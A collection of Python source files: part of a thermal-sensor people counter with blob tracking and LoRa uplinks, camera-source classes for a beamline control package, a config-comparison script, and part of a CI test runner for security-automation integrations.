parser.add_argument(
'--blob_filterbyconvexity', help='blod detection filter by convexity', action='store_true')
parser.add_argument(
'--blob_min_convexity', help='blod detection filter by convexity min convexity', type=float)
parser.add_argument(
'--blob_filterbyinertia', help='blod detection filter by inertia', action='store_true')
parser.add_argument(
'--blob_min_inertiaratio', help='blod detection filter by inertia inertia ratio', type=float)
parser.add_argument(
'--lora_send_interval', help='length of intervals between attempted lora uplinks in seconds', type=int)
args = parser.parse_args()
print(args)
i2c_bus = busio.I2C(board.SCL, board.SDA)
COLOR_DEPTH = args.color_depth
MAX_TEMP = args.max_temp
AMBIENT_OFFSET = args.ambient_offset
AMBIENT_TIME = args.ambient_time
BLOB_MIN_THRESHOLD = args.blob_min_threshold
BLOB_MAX_THRESHOLD = args.blob_max_threshold
BLOB_FILTERBYAREA = args.blob_filterbyarea
BLOB_MIN_AREA = args.blob_min_area
BLOB_FILTERBYCIRCULARITY = args.blob_filterbycircularity
BLOB_MIN_CIRCULARITY = args.blob_min_circularity
BLOB_FILTERBYCONVEXITY = args.blob_filterbyconvexity
BLOB_MIN_CONVEXITY = args.blob_min_convexity
BLOB_FILTERBYINERTIA = args.blob_filterbyinertia
BLOB_MIN_INERTIARATIO = args.blob_min_inertiaratio
LORA_SEND_INTERVAL = args.lora_send_interval
if args.headless:
os.putenv('SDL_VIDEODRIVER', 'dummy')
else:
os.putenv('SDL_FBDEV', '/dev/fb1')
pygame.init()
# initialize the sensor
sensor = adafruit_amg88xx.AMG88XX(i2c_bus)
points = [(math.floor(ix / 8), (ix % 8)) for ix in range(0, 64)]
grid_x, grid_y = np.mgrid[0:7:32j, 0:7:32j]
# sensor is an 8x8 grid so lets do a square
height = 240
width = 240
# the list of colors we can choose from
black = Color("black")
colors = list(black.range_to(Color("white"), COLOR_DEPTH))
# create the array of colors
colors = [(int(c.red * 255), int(c.green * 255), int(c.blue * 255))
for c in colors]
displayPixelWidth = width / 30
displayPixelHeight = height / 30
lcd = pygame.display.set_mode((width, height))
lcd.fill((255, 0, 0))
pygame.display.update()
pygame.mouse.set_visible(False)
lcd.fill((0, 0, 0))
pygame.display.update()
# Setup SimpleBlobDetector parameters.
params = cv2.SimpleBlobDetector_Params()
# Change thresholds
if BLOB_MIN_THRESHOLD:
params.minThreshold = BLOB_MIN_THRESHOLD
if BLOB_MAX_THRESHOLD:
params.maxThreshold = BLOB_MAX_THRESHOLD
# Filter by Area.
if BLOB_FILTERBYAREA:
params.filterByArea = BLOB_FILTERBYAREA
params.minArea = BLOB_MIN_AREA
# Filter by Circularity
if BLOB_FILTERBYCIRCULARITY:
params.filterByCircularity = BLOB_FILTERBYCIRCULARITY
params.minCircularity = BLOB_MIN_CIRCULARITY
# Filter by Convexity
if BLOB_FILTERBYCONVEXITY:
params.filterByConvexity = BLOB_FILTERBYCONVEXITY
params.minConvexity = BLOB_MIN_CONVEXITY
# Filter by Inertia
if BLOB_FILTERBYINERTIA:
params.filterByInertia = BLOB_FILTERBYINERTIA
params.minInertiaRatio = BLOB_MIN_INERTIARATIO
# Set up the detector with default parameters.
detector = cv2.SimpleBlobDetector_create(params)
# initialize centroid tracker
ct = CentroidTracker()
# a dictionary to map each unique object ID to a TrackableObject
trackableObjects = {}
# the total number of objects that have moved either up or down
total_down = 0
total_up = 0
total_down_old = 0
total_up_old = 0
# let the sensor initialize
time.sleep(.1)
# press key to exit
screencap = True
# array to hold mode of last 10 minutes of temperatures
mode_list = []
send_thread = threading.Thread(
target=send_lora, args=(LORA_SEND_INTERVAL,))
send_thread.start()
print('sensor started!')
while(screencap):
start = time.time()
# read the pixels
pixels = []
for row in sensor.pixels:
pixels = pixels + row
payload['a'] = 0
payload['o'] = 0
payload['c'] = ct.get_count()
mode_result = stats.mode([round(p) for p in pixels])
mode_list.append(int(mode_result[0]))
# instead of taking the ambient temperature over one frame of data take it over a set amount of time
MAX_TEMP = float(np.mean(mode_list)) + AMBIENT_OFFSET
pixels = [map_value(p, mode_result[0] + 1, MAX_TEMP, 0,
COLOR_DEPTH - 1) for p in pixels]
# perform interpolation
bicubic = griddata(points, pixels, (grid_x, grid_y), method='cubic')
# draw everything
for ix, row in enumerate(bicubic):
for jx, pixel in enumerate(row):
try:
pygame.draw.rect(lcd, colors[constrain(int(pixel), 0, COLOR_DEPTH - 1)],
(displayPixelHeight * ix, displayPixelWidth * jx, displayPixelHeight, displayPixelWidth))
except:
print("Caught drawing error")
surface = pygame.display.get_surface()
myfont = pygame.font.SysFont("comicsansms", 25)
img = pygame.surfarray.array3d(surface)
img = np.swapaxes(img, 0, 1)
# Read image
img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
img = cv2.bitwise_not(img)
# Detect blobs.
keypoints = detector.detect(img)
img_with_keypoints = cv2.drawKeypoints(img, keypoints, np.array(
[]), (0, 0, 255), cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)
# draw a horizontal line in the center of the frame -- once an
# object crosses this line we will determine whether they were
# moving 'up' or 'down'
pygame.draw.line(lcd, (255, 255, 255),
(0, height // 2), (width, height // 2), 2)
pygame.display.update()
for i in range(0, len(keypoints)):
x = keypoints[i].pt[0]
y = keypoints[i].pt[1]
# print circle around blobs
pygame.draw.circle(lcd, (200, 0, 0), (int(
x), int(y)), round(keypoints[i].size), 2)
# update our centroid tracker using the detected centroids
objects = ct.update(keypoints)
# loop over the tracked objects
for (objectID, centroid) in objects.items():
# check to see if a trackable object exists for the current
# object ID
to = trackableObjects.get(objectID, None)
# if there is no existing trackable object, create one
if to is None:
to = TrackableObject(objectID, centroid)
# otherwise, there is a trackable object so we can utilize it
# to determine direction
else:
# the difference between the y-coordinate of the *current*
# centroid and the mean of *previous* centroids will tell
# us in which direction the object is moving (negative for
# 'up' and positive for 'down')
y = [c[1] for c in to.centroids]
direction = centroid[1] - np.mean(y)
to.centroids.append(centroid)
# check to see if the object has been counted or not
if not to.counted:
# if the direction is negative (indicating the object
# is moving up) AND the centroid is above the center
# line, count the object
# the historical centroid must present in the lower half of the screen
if direction < 0 and centroid[1] < height // 2 and count_within_range(y, height//2, height) > 0:
total_up += 1
to.counted = True
# if the direction is positive (indicating the object
# is moving down) AND the centroid is below the
# center line, count the object
# the historical centroid must present in the upper half of the screen
elif direction > 0 and centroid[1] > height // 2 and count_within_range(y, 0, height//2) > 0:
total_down += 1
to.counted = True
# store the trackable object in our dictionary
trackableObjects[objectID] = to
# update counter in top left
textsurface1 = myfont.render(
"IN: "+str(total_up), False, (255, 255, 255))
textsurface2 = myfont.render(
'OUT: '+str(total_down), False, (255, 255, 255))
lcd.blit(textsurface1, (0, 0))
lcd.blit(textsurface2, (0, 25))
total_up_old = total_up
total_down_old = total_down
pygame.display.update()
for event in pygame.event.get():
if event.type == pygame.KEYDOWN:
print('terminating...')
screencap = False
break
# for running the save on for a certain amount of time
# if time.time() - start_time >= 10:
# print('terminating...')
# screencap = False
# empty mode_list every AMBIENT_TIME *10 seconds to get current ambient temperature
if len(mode_list) > AMBIENT_TIME:
mode_list = []
time.sleep(max(1./25 - (time.time() - start), 0))
# Release everything if job is finished
cv2.destroyAllWindows()
if __name__ == "__main__":
main()
|
video.py
|
import os
import re
import threading
import time
from io import BytesIO, StringIO
import numpy
import redis
import requests
from PIL import Image
from zope.interface import implementer
from mxdc import Signal, Device
from mxdc import conf
from mxdc.utils.log import get_module_logger
from .interfaces import ICamera, IZoomableCamera, IPTZCameraController
# setup module logger with a default do-nothing handler
logger = get_module_logger(__name__)
session = requests.Session()
@implementer(ICamera)
class VideoSrc(Device):
"""
Base class for all Video Sources. Maintains a list of listenners (sinks)
and updates each one when the video frame changes.
:param name: Camera Name (str)
:param maxfps: Max frames per second (float)
"""
class Signals:
resized = Signal("resized", arg_types=(int,int))
def __init__(self, name="Basic Camera", maxfps=5.0):
super().__init__()
self.frame = None
self.name = name
self.size = (768, 576)
self.maxfps = max(1.0, maxfps)
self.resolution = 1.0e-3
self.gain_factor = 1.0
self.gain_value = 1.0
self.zoom_save = False
self.sinks = []
self._stopped = True
self.set_state(active=True)
def configure(self, **kwargs):
"""
Configure the camera. Keyword arguments are device dependent.
"""
pass
def add_sink(self, sink):
"""
Add a sink to the Camera
:param sink: :class:`mxdc.interface.IVideoSink` provider
"""
self.sinks.append(sink)
sink.set_src(self)
def del_sink(self, sink):
"""
Remove a video sink.
:param sink: :class:`mxdc.interface.IVideoSink` provider
"""
if sink in self.sinks:
self.sinks.remove(sink)
def start(self):
"""
Start producing video frames.
"""
if self._stopped:
self._stopped = False
worker = threading.Thread(target=self.streamer)
worker.setName('Video Thread: %s' % self.name)
worker.setDaemon(True)
worker.start()
def stop(self):
"""
Stop producing video frames.
"""
self._stopped = True
def streamer(self):
dur = 1.0 / self.maxfps
while not self._stopped:
t = time.time()
if self.is_active() and any(not (sink.stopped) for sink in self.sinks):
try:
img = self.get_frame()
if img and img.size != self.size:
self.size = img.size
self.set_state(resized=self.size)
if not img:
continue
for sink in self.sinks:
sink.display(img)
except Exception as e:
logger.warning('(%s) Error fetching frame:\n %s' % (self.name, e))
raise
time.sleep(max(0, dur - (time.time() - t)))
def get_frame(self):
"""
Obtain the most recent video frame.
:return: A PIL Image object.
"""
pass
def cleanup(self):
self.stop()
class SimCamera(VideoSrc):
"""
Simulated Camera
"""
def __init__(self, name="Camera Simulator", size=(1280, 960)):
super().__init__(name=name)
self.size = size
self.resolution = 5.34e-3 * numpy.exp(-0.18)
self._packet_size = self.size[0] * self.size[1]*3
self._fsource = open('/dev/urandom', 'rb')
self.set_state(active=True, health=(0, '', ''))
def get_frame(self):
data = self._fsource.read(self._packet_size)
self.frame = Image.frombytes('RGB', self.size, data)
return self.frame
class SimGIFCamera(VideoSrc):
"""
Simulated Camera
"""
def __init__(self, name="GIF Camera Simulator"):
super().__init__(name=name)
self.src = Image.open(os.path.join(conf.APP_DIR, 'share/data/simulated/crystal.gif'))
self.index = 0
self.size = (1280, 960)
self.resolution = 5.34e-3 * numpy.exp(-0.18)
self.set_state(active=True, health=(0, '', ''))
def get_frame(self):
try:
self.src.seek(self.index)
self.index += 1
self.frame = self.src.resize(self.size, Image.NEAREST).convert('RGB')
except EOFError:
self.index = 0
return self.frame
@implementer(IPTZCameraController)
class SimPTZCamera(SimCamera):
"""
Simulated PTZ Camera
"""
def __init__(self):
super().__init__(name='Sim PTZ Camera', size=(1920, 1080))
def zoom(self, value):
pass
def center(self, x, y):
pass
def goto(self, position):
pass
def get_presets(self):
presets = ["Hutch", "Detector", "Robot", "Goniometer", "Sample", "Panel"]
return presets
class MJPGCamera(VideoSrc):
"""
MJPG Camera
"""
def __init__(self, url, size=(768, 576), name='MJPG Camera'):
VideoSrc.__init__(self, name, maxfps=10.0)
self.size = size
self._read_size = 1024
self.url = url
self._last_frame = time.time()
self.stream = None
self.set_state(active=True)
self.lock = threading.Lock()
def get_frame(self):
return self.get_frame_raw()
def get_frame_raw(self):
if not self.stream:
self.stream = requests.get(self.url, stream=True).raw
try:
with self.lock:
both_found = False
while not both_found:
self.data += self.stream.read(self._read_size)
b = self.data.rfind('\xff\xd9')
a = self.data[:b].rfind('\xff\xd8')
if a != -1 and b != -1:
jpg = self.data[a:b + 2]
self.data = self.data[b + 2:]
self.frame = Image.open(StringIO(jpg))
both_found = True
time.sleep(0)
except Exception as e:
logger.error(e)
self.stream = requests.get(self.url, stream=True).raw
return self.frame
class JPGCamera(VideoSrc):
"""
JPG Camera
"""
def __init__(self, url, size=(768, 576), name='JPG Camera'):
VideoSrc.__init__(self, name, maxfps=10.0)
self.size = size
self.url = url
self.session = requests.Session()
self.set_state(active=True)
def get_frame(self):
return self.get_frame_raw()
def get_frame_raw(self):
r = self.session.get(self.url)
if r.status_code == 200:
self.frame = Image.open(BytesIO(r.content))
return self.frame
class REDISCamera(VideoSrc):
"""
REDIS Camera
"""
ATTRS = {
'gain': 'GainRaw',
'exposure': 'ExposureTimeAbs'
}
def __init__(self, server, mac,size=(1280,1024), name='REDIS Camera'):
VideoSrc.__init__(self, name, maxfps=15.0)
self.store = redis.Redis(host=server, port=6379, db=0)
self.key = mac
self.server = server
self.size = size
self.set_state(active=True)
self.lock = threading.Lock()
def configure(self, **kwargs):
if 'gain_factor' in kwargs:
self.gain_factor = kwargs.pop('gain_factor')
kwargs['gain'] = self.gain_value
for k, v in list(kwargs.items()):
attr = self.ATTRS.get(k)
if not attr: continue
if k == 'gain':
if int(v) == self.gain_value: continue
self.gain_value = int(v)
value = max(1, min(22, self.gain_factor * self.gain_value))
else:
value = v
self.store.publish('{}:CFG:{}'.format(self.key, attr), value)
def get_frame(self):
return self.get_frame_jpg()
def get_frame_raw(self):
with self.lock:
data = self.store.get('{}:RAW'.format(self.key))
while len(data) < self.size[0] * self.size[1] * 3:
data = self.store.get('{}:RAW'.format(self.key))
time.sleep(0.002)
img = Image.frombytes('RGB', self.size, data, 'raw')
self.frame = img.transpose(Image.FLIP_LEFT_RIGHT)
return self.frame
def get_frame_jpg(self):
with self.lock:
data = self.store.get('{}:JPG'.format(self.key))
self.frame = Image.open(BytesIO(data))
return self.frame
class AxisCamera(JPGCamera):
"""
Axis JPG Camera
"""
def __init__(self, hostname, idx=None, name='Axis Camera'):
if idx is None:
url = 'http://%s/jpg/image.jpg' % hostname
else:
url = 'http://%s/jpg/%s/image.jpg' % (hostname, idx)
super(AxisCamera, self).__init__(url, name=name)
@implementer(IZoomableCamera)
class ZoomableCamera(object):
def __init__(self, camera, zoom_motor):
self.camera = camera
self._zoom = zoom_motor
def zoom(self, value, wait=False):
"""
Zoom to the given value.
:param value: zoom value
:param wait: (boolean) default False, whether to wait until camera has zoomed in.
"""
self._zoom.move_to(value, wait=wait)
def __getattr__(self, key):
try:
return getattr(self.camera, key)
except AttributeError:
raise
@implementer(IPTZCameraController)
class AxisPTZCamera(AxisCamera):
"""
Axis PTZ Camera
"""
def __init__(self, hostname, idx=None, name='Axis PTZ Camera'):
AxisCamera.__init__(self, hostname, idx, name)
self.url_root = 'http://{}/axis-cgi/com/ptz.cgi'.format(hostname)
self._rzoom = 0
self.presets = []
try:
self.fetch_presets()
except requests.ConnectionError:
logger.error('Failed to establish connection')
def zoom(self, value, wait=False):
requests.get(self.url_root, params={'rzoom': value})
self._rzoom -= value
def center(self, x, y):
"""
Center the Pan-Tilt-Zoom Camera at the given point.
:param x: (int), x point
:param y: (int), y point
"""
requests.get(self.url_root, params={'center': '{},{}'.format(x, y)})
def goto(self, position):
"""
Go to the given named position
:param position: named position
"""
requests.get(self.url_root, params={'gotoserverpresetname': position})
self._rzoom = 0
def get_presets(self):
return self.presets
def fetch_presets(self):
"""
Obtain a list of named positions from the PTZ Camera
:return: list of strings
"""
presets = []
r = requests.get(self.url_root, params={'query': 'presetposall'})
if r.status_code == requests.codes.ok:
pospatt = re.compile('presetposno.+=(?P<name>[\w ]+)')
for line in r.text.split('\n'):
m = pospatt.match(line)
if m:
presets.append(m.group('name'))
self.presets = presets
|
cfg_compare.py
|
#!/usr/bin/env python
import os, sys, subprocess
import argparse
import subprocess
import threading
import timeit
from configobj import ConfigObj
from cvguipy import cvconfig
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="compare two configuration files")
parser.add_argument('config1', help= "configuration file name")
parser.add_argument('config2', help= "configuration file name")
args = parser.parse_args()
# inputVideo check
if not os.path.exists(args.config1):
print("{} does not exist! Exiting...".format(args.config1))
sys.exit(1)
if not os.path.exists(args.config2):
print("{} does not exist! Exiting...".format(args.config2))
sys.exit(1)
config1 = ConfigObj(args.config1)
config2 = ConfigObj(args.config2)
threads = []
# get configuration and put them to a List
cfg_list1 = cvconfig.CVConfigList()
threads.append(threading.Thread(target = cvconfig.config_to_list, args = (cfg_list1, config1)))
cfg_list2 = cvconfig.CVConfigList()
threads.append(threading.Thread(target = cvconfig.config_to_list, args = (cfg_list2, config2)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
while cfg_list1.name is not None and cfg_list2.name is not None:
if cfg_list1.name != cfg_list2.name:
print("Not Cosistent Configuration...Exiting...")
sys.exit(1)
if cfg_list1.range[0] != cfg_list2.range[0]:
print("{}: {} | {}".format(cfg_list1.name, cfg_list1.range, cfg_list2.range))
cfg_list1 = cfg_list1.next
cfg_list2 = cfg_list2.next
|
test_content.py
|
from __future__ import print_function
import os
import re
import sys
import json
import time
import argparse
import threading
import subprocess
import traceback
from time import sleep
import datetime
from distutils.version import LooseVersion
import pytz
from google.cloud import storage
from google.api_core.exceptions import PreconditionFailed
from queue import Queue
from contextlib import contextmanager
import urllib3
import requests
import demisto_client.demisto_api
from slackclient import SlackClient
from Tests.mock_server import MITMProxy, AMIConnection
from Tests.test_integration import Docker, test_integration, disable_all_integrations
from Tests.test_dependencies import get_used_integrations, get_tests_allocation_for_threads
from demisto_sdk.commands.common.constants import RUN_ALL_TESTS_FORMAT, FILTER_CONF, PB_Status
from demisto_sdk.commands.common.tools import print_color, print_error, print_warning, \
LOG_COLORS, str2bool
# Disable insecure warnings
urllib3.disable_warnings()
SERVER_URL = "https://{}"
INTEGRATIONS_CONF = "./Tests/integrations_file.txt"
FAILED_MATCH_INSTANCE_MSG = "{} Failed to run.\n There are {} instances of {}, please select one of them by using " \
"the instance_name argument in conf.json. The options are:\n{}"
SERVICE_RESTART_TIMEOUT = 300
SERVICE_RESTART_POLLING_INTERVAL = 5
LOCKS_PATH = 'content-locks'
BUCKET_NAME = os.environ.get('GCS_ARTIFACTS_BUCKET')
CIRCLE_BUILD_NUM = os.environ.get('CIRCLE_BUILD_NUM')
WORKFLOW_ID = os.environ.get('CIRCLE_WORKFLOW_ID')
CIRCLE_STATUS_TOKEN = os.environ.get('CIRCLECI_STATUS_TOKEN')
SLACK_MEM_CHANNEL_ID = 'CM55V7J8K'
def options_handler():
parser = argparse.ArgumentParser(description='Utility for batch action on incidents')
parser.add_argument('-k', '--apiKey', help='The Demisto API key for the server', required=True)
parser.add_argument('-s', '--server', help='The server URL to connect to')
parser.add_argument('-c', '--conf', help='Path to conf file', required=True)
parser.add_argument('-e', '--secret', help='Path to secret conf file')
parser.add_argument('-n', '--nightly', type=str2bool, help='Run nightly tests')
parser.add_argument('-t', '--slack', help='The token for slack', required=True)
parser.add_argument('-a', '--circleci', help='The token for circleci', required=True)
parser.add_argument('-b', '--buildNumber', help='The build number', required=True)
parser.add_argument('-g', '--buildName', help='The build name', required=True)
parser.add_argument('-i', '--isAMI', type=str2bool, help='is AMI build or not', default=False)
parser.add_argument('-m', '--memCheck', type=str2bool,
help='Should trigger memory checks or not. The slack channel to check the data is: '
'dmst_content_nightly_memory_data', default=False)
parser.add_argument('-d', '--serverVersion', help='Which server version to run the '
'tests on(Valid only when using AMI)', default="NonAMI")
parser.add_argument('-l', '--testsList', help='List of specific, comma separated'
'tests to run')
options = parser.parse_args()
tests_settings = TestsSettings(options)
return tests_settings
class TestsSettings:
def __init__(self, options):
self.api_key = options.apiKey
self.server = options.server
self.conf_path = options.conf
self.secret_conf_path = options.secret
self.nightly = options.nightly
self.slack = options.slack
self.circleci = options.circleci
self.buildNumber = options.buildNumber
self.buildName = options.buildName
self.isAMI = options.isAMI
self.memCheck = options.memCheck
self.serverVersion = options.serverVersion
self.serverNumericVersion = None
self.specific_tests_to_run = self.parse_tests_list_arg(options.testsList)
self.is_local_run = (self.server is not None)
@staticmethod
def parse_tests_list_arg(tests_list):
tests_to_run = tests_list.split(",") if tests_list else []
return tests_to_run
class PrintJob:
def __init__(self, message_to_print, print_function_to_execute, message_color=None):
self.print_function_to_execute = print_function_to_execute
self.message_to_print = message_to_print
self.message_color = message_color
def execute_print(self):
if self.message_color:
self.print_function_to_execute(self.message_to_print, self.message_color)
else:
self.print_function_to_execute(self.message_to_print)
class ParallelPrintsManager:
def __init__(self, number_of_threads):
self.threads_print_jobs = [[] for i in range(number_of_threads)]
self.print_lock = threading.Lock()
self.threads_last_update_times = [time.time() for i in range(number_of_threads)]
def should_update_thread_status(self, thread_index):
current_time = time.time()
thread_last_update = self.threads_last_update_times[thread_index]
return current_time - thread_last_update > 300
def add_print_job(self, message_to_print, print_function_to_execute, thread_index, message_color=None,
include_timestamp=False):
if include_timestamp:
message_to_print = f'[{datetime.datetime.now()}] {message_to_print}'
print_job = PrintJob(message_to_print, print_function_to_execute, message_color=message_color)
self.threads_print_jobs[thread_index].append(print_job)
if self.should_update_thread_status(thread_index):
print("Thread {} is still running.".format(thread_index))
self.threads_last_update_times[thread_index] = time.time()
def execute_thread_prints(self, thread_index):
self.print_lock.acquire()
prints_to_execute = self.threads_print_jobs[thread_index]
for print_job in prints_to_execute:
print_job.execute_print()
self.print_lock.release()
self.threads_print_jobs[thread_index] = []
class TestsDataKeeper:
def __init__(self):
self.succeeded_playbooks = []
self.failed_playbooks = []
self.skipped_tests = []
self.skipped_integrations = []
self.rerecorded_tests = []
self.empty_files = []
self.unmockable_integrations = {}
def add_tests_data(self, succeed_playbooks, failed_playbooks, skipped_tests, skipped_integration,
unmockable_integrations):
# Using multiple appends and not extend since append is guaranteed to be thread safe
for playbook in succeed_playbooks:
self.succeeded_playbooks.append(playbook)
for playbook in failed_playbooks:
self.failed_playbooks.append(playbook)
for playbook in skipped_tests:
self.skipped_tests.append(playbook)
for playbook in skipped_integration:
self.skipped_integrations.append(playbook)
for playbook_id, reason in unmockable_integrations.items():
self.unmockable_integrations[playbook_id] = reason
def add_proxy_related_test_data(self, proxy):
# Using multiple appends and not extend since append is guaranteed to be thread safe
for playbook_id in proxy.rerecorded_tests:
self.rerecorded_tests.append(playbook_id)
for playbook_id in proxy.empty_files:
self.empty_files.append(playbook_id)
def print_test_summary(tests_data_keeper, is_ami=True):
succeed_playbooks = tests_data_keeper.succeeded_playbooks
failed_playbooks = tests_data_keeper.failed_playbooks
skipped_tests = tests_data_keeper.skipped_tests
unmocklable_integrations = tests_data_keeper.unmockable_integrations
skipped_integration = tests_data_keeper.skipped_integrations
rerecorded_tests = tests_data_keeper.rerecorded_tests
empty_files = tests_data_keeper.empty_files
succeed_count = len(succeed_playbooks)
failed_count = len(failed_playbooks)
skipped_count = len(skipped_tests)
rerecorded_count = len(rerecorded_tests) if is_ami else 0
empty_mocks_count = len(empty_files) if is_ami else 0
unmocklable_integrations_count = len(unmocklable_integrations)
print('\nTEST RESULTS:')
tested_playbooks_message = '\t Number of playbooks tested - ' + str(succeed_count + failed_count)
print(tested_playbooks_message)
succeeded_playbooks_message = '\t Number of succeeded tests - ' + str(succeed_count)
print_color(succeeded_playbooks_message, LOG_COLORS.GREEN)
if failed_count > 0:
failed_tests_message = '\t Number of failed tests - ' + str(failed_count) + ':'
print_error(failed_tests_message)
for playbook_id in failed_playbooks:
print_error('\t - ' + playbook_id)
if rerecorded_count > 0:
recording_warning = '\t Tests with failed playback and successful re-recording - ' + str(rerecorded_count) + ':'
print_warning(recording_warning)
for playbook_id in rerecorded_tests:
print_warning('\t - ' + playbook_id)
if empty_mocks_count > 0:
empty_mock_successes_msg = '\t Successful tests with empty mock files - ' + str(empty_mocks_count) + ':'
print(empty_mock_successes_msg)
proxy_explanation = '\t (either there were no http requests or no traffic is passed through the proxy.\n' \
'\t Investigate the playbook and the integrations.\n' \
'\t If the integration has no http traffic, add to unmockable_integrations in conf.json)'
print(proxy_explanation)
for playbook_id in empty_files:
print('\t - ' + playbook_id)
if len(skipped_integration) > 0:
skipped_integrations_warning = '\t Number of skipped integration - ' + str(len(skipped_integration)) + ':'
print_warning(skipped_integrations_warning)
for playbook_id in skipped_integration:
print_warning('\t - ' + playbook_id)
if skipped_count > 0:
skipped_tests_warning = '\t Number of skipped tests - ' + str(skipped_count) + ':'
print_warning(skipped_tests_warning)
for playbook_id in skipped_tests:
print_warning('\t - ' + playbook_id)
if unmocklable_integrations_count > 0:
unmockable_warning = '\t Number of unmockable integrations - ' + str(unmocklable_integrations_count) + ':'
print_warning(unmockable_warning)
for playbook_id, reason in unmocklable_integrations.items():
print_warning('\t - ' + playbook_id + ' - ' + reason)
def update_test_msg(integrations, test_message):
if integrations:
integrations_names = [integration['name'] for integration in
integrations]
test_message = test_message + ' with integration(s): ' + ','.join(
integrations_names)
return test_message
def turn_off_telemetry(server, demisto_api_key):
"""
Turn off telemetry on the AMI instance
:param server: demisto server to connect to
:param demisto_api_key: api key to use for connection
:return: None
"""
client = demisto_client.configure(base_url=server, api_key=demisto_api_key, verify_ssl=False)
body, status_code, _ = demisto_client.generic_request_func(self=client, method='POST',
path='/telemetry?status=notelemetry')
if status_code != 200:
print_error('Request to turn off telemetry failed with status code "{}"\n{}'.format(status_code, body))
sys.exit(1)
def reset_containers(server, demisto_api_key, prints_manager, thread_index):
prints_manager.add_print_job('Resetting containers', print, thread_index)
client = demisto_client.configure(base_url=server, api_key=demisto_api_key, verify_ssl=False)
body, status_code, _ = demisto_client.generic_request_func(self=client, method='POST',
path='/containers/reset')
if status_code != 200:
error_msg = 'Request to reset containers failed with status code "{}"\n{}'.format(status_code, body)
prints_manager.add_print_job(error_msg, print_error, thread_index)
prints_manager.execute_thread_prints(thread_index)
sys.exit(1)
sleep(10)
def has_unmockable_integration(integrations, unmockable_integrations):
return list(set(x['name'] for x in integrations).intersection(unmockable_integrations.keys()))
def get_docker_limit():
process = subprocess.Popen(['cat', '/sys/fs/cgroup/memory/memory.limit_in_bytes'], stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
stdout, stderr = process.communicate()
return stdout, stderr
def get_docker_processes_data():
process = subprocess.Popen(['ps', 'aux'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = process.communicate()
return stdout, stderr
def get_docker_memory_data():
process = subprocess.Popen(['cat', '/sys/fs/cgroup/memory/memory.usage_in_bytes'], stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
stdout, stderr = process.communicate()
return stdout, stderr
def send_slack_message(slack, chanel, text, user_name, as_user):
sc = SlackClient(slack)
sc.api_call(
"chat.postMessage",
channel=chanel,
username=user_name,
as_user=as_user,
text=text,
mrkdwn='true'
)
def run_test_logic(conf_json_test_details, tests_queue, tests_settings, c, failed_playbooks, integrations, playbook_id,
succeed_playbooks, test_message, test_options, slack, circle_ci, build_number, server_url,
build_name, prints_manager, thread_index=0, is_mock_run=False):
with acquire_test_lock(integrations,
test_options.get('timeout'),
prints_manager,
thread_index,
tests_settings.conf_path) as lock:
if lock:
status, inc_id = test_integration(c, server_url, integrations, playbook_id, prints_manager, test_options,
is_mock_run, thread_index=thread_index)
# c.api_client.pool.close()
if status == PB_Status.COMPLETED:
prints_manager.add_print_job('PASS: {} succeed'.format(test_message), print_color, thread_index,
message_color=LOG_COLORS.GREEN)
succeed_playbooks.append(playbook_id)
elif status == PB_Status.NOT_SUPPORTED_VERSION:
not_supported_version_message = 'PASS: {} skipped - not supported version'.format(test_message)
prints_manager.add_print_job(not_supported_version_message, print, thread_index)
succeed_playbooks.append(playbook_id)
else:
error_message = 'Failed: {} failed'.format(test_message)
prints_manager.add_print_job(error_message, print_error, thread_index)
playbook_id_with_mock = playbook_id
if not is_mock_run:
playbook_id_with_mock += " (Mock Disabled)"
failed_playbooks.append(playbook_id_with_mock)
if not tests_settings.is_local_run:
notify_failed_test(slack, circle_ci, playbook_id, build_number, inc_id, server_url, build_name)
succeed = status in (PB_Status.COMPLETED, PB_Status.NOT_SUPPORTED_VERSION)
else:
tests_queue.put(conf_json_test_details)
succeed = False
return succeed
# run the test using a real instance, record traffic.
def run_and_record(conf_json_test_details, tests_queue, tests_settings, c, proxy, failed_playbooks, integrations,
playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci, build_number,
server_url, build_name, prints_manager, thread_index=0):
proxy.set_tmp_folder()
proxy.start(playbook_id, record=True, thread_index=thread_index, prints_manager=prints_manager)
succeed = run_test_logic(conf_json_test_details, tests_queue, tests_settings, c, failed_playbooks, integrations,
playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci, build_number,
server_url, build_name, prints_manager, thread_index=thread_index, is_mock_run=True)
proxy.stop(thread_index=thread_index, prints_manager=prints_manager)
proxy.clean_mock_file(playbook_id, thread_index=thread_index, prints_manager=prints_manager)
if succeed:
proxy.move_mock_file_to_repo(playbook_id, thread_index=thread_index, prints_manager=prints_manager)
proxy.set_repo_folder()
return succeed
def mock_run(conf_json_test_details, tests_queue, tests_settings, c, proxy, failed_playbooks, integrations,
playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci, build_number, server_url,
build_name, start_message, prints_manager, thread_index=0):
rerecord = False
if proxy.has_mock_file(playbook_id):
start_mock_message = '{} (Mock: Playback)'.format(start_message)
prints_manager.add_print_job(start_mock_message, print, thread_index, include_timestamp=True)
proxy.start(playbook_id, thread_index=thread_index, prints_manager=prints_manager)
# run test
status, _ = test_integration(c, server_url, integrations, playbook_id, prints_manager, test_options,
is_mock_run=True, thread_index=thread_index)
# use results
proxy.stop(thread_index=thread_index, prints_manager=prints_manager)
if status == PB_Status.COMPLETED:
succeed_message = 'PASS: {} succeed'.format(test_message)
prints_manager.add_print_job(succeed_message, print_color, thread_index, LOG_COLORS.GREEN)
succeed_playbooks.append(playbook_id)
end_mock_message = f'------ Test {test_message} end ------\n'
prints_manager.add_print_job(end_mock_message, print, thread_index, include_timestamp=True)
return
if status == PB_Status.NOT_SUPPORTED_VERSION:
not_supported_version_message = 'PASS: {} skipped - not supported version'.format(test_message)
prints_manager.add_print_job(not_supported_version_message, print, thread_index)
succeed_playbooks.append(playbook_id)
end_mock_message = f'------ Test {test_message} end ------\n'
prints_manager.add_print_job(end_mock_message, print, thread_index, include_timestamp=True)
return
if status == PB_Status.FAILED_DOCKER_TEST:
error_message = 'Failed: {} failed'.format(test_message)
prints_manager.add_print_job(error_message, print_error, thread_index)
failed_playbooks.append(playbook_id)
